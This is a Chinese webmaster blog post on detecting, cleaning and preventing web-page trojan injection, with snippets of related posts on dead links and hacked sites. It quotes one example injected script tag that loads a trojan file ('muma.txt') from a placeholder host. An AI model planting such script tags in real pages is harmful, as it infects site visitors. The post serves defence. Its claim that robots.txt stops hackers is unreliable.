Categories


Tags


如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。

1:网页挂马的种类.

目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。

卢松松以前做过的‘极品源码下载站’就遇到过JS挂马

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

&lsquo;校园闹翻天论坛&rsquo;就遇到用户提权,利用动网程序漏洞(上传附件漏洞)拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID

2:如何检测网页是否被挂马。

(1):专业检测工具,六款免费网页安全检测工具横向测评(华军软件园)点此进入

(2):Google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3):杀毒软件检测,常用的杀毒软件也可以检测出来。

(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

(5):使用McAfee SiteAdvisor安全浏览网页的插件。例:检测卢松松博客是否安全可点此查看。

如何预防和检测网页挂马? 网站安全 SEO推广 第1张

3:如何清除网页木马。

一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。

如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)

4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。

(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。

(2):保证你所使用的程序及时的更新。

(3):不要在前台网页上加注后台管理程序登陆页面的链接。

(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。

(5):管理员的用户名和密码要有一定复杂性,不能过于简单。

(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。

(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。

(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。 点此查看robots.txt使用方法。

来源:卢松松博客


Public @ 2014-10-23 15:37:43

手把手教您制作死链列表文件

死链(dead link)指的是网上某个链接已经失效或者链接到了不存在的页面。在网站开发和维护过程中,我们需要及时发现并修复死链,以提高用户体验和SEO效果。制作死链列表文件是一种常见的方法,可以有效地帮助我们管理和修复死链问题。 以下是手把手教您制作死链列表文件的步骤: 1. 打开网站地图或者网站目录,找到所有页面的URL地址。 2. 使用爬虫工具或者在线工具扫描整个网站,找到所有的死链。

Public @ 2023-06-07 07:50:17

网站被黑了怎么办?

网站被黑现在越来越常见,不仅中国,全世界都一样。Google官方博客3月份的一篇帖子提到,被黑的网站数目2016年比2015年增加了32%,而且没有减缓的趋势。我本身就是卖服务器的,每天在后台看到的扫描端口、撞密码、利用CMS漏洞注入之类的太多太多了。为SEO而黑别人网站是其中一个原因,黑进别人网站后,可以创建页面,在现有页面加内容、加链接,做转向,做cloaking等等。当然,SEO只是比较小的

Public @ 2015-02-25 15:37:30

[原创]shopex清理数据库挂马

在网站开发和维护过程中,我们经常会遇到数据库被挂马的情况。挂马是指黑客利用漏洞或弱密码等方式入侵网站服务器,通过修改数据库中的某些数据或添加一些恶意代码等手段,实现对网站的控制和攻击。这不仅会影响网站的正常运营,还会给网站的用户带来安全隐患。 本文主要介绍如何使用shopex平台的工具清理数据库挂马,以保障网站的安全稳定运行。 1. 登录shopex平台后台,点击左侧菜单栏的“工具箱”-“系统

Public @ 2023-04-24 17:00:29

我的网站被360提示被挂马有风险怎么处理

首先,清理空间里的挂马代码,保证空间能够正常访问。A:如果您希望能够尽快去掉挂马风险提示,360网站监测中心为注册用户提供了一个立即重新检测的功能,以解站长们的燃眉之急。具体操作方法为:1.登录360网站监测中心(http://jc.360.cn)。首次注册需要先添加网站。2.进入重新检测功能栏。3. 找到需要检测的网站,点击“重新检测”,等待检测结果即可,最新的扫描结果将在最长一个小时内给出。注

Public @ 2014-07-07 15:37:40

更多您感兴趣的搜索

0.420514s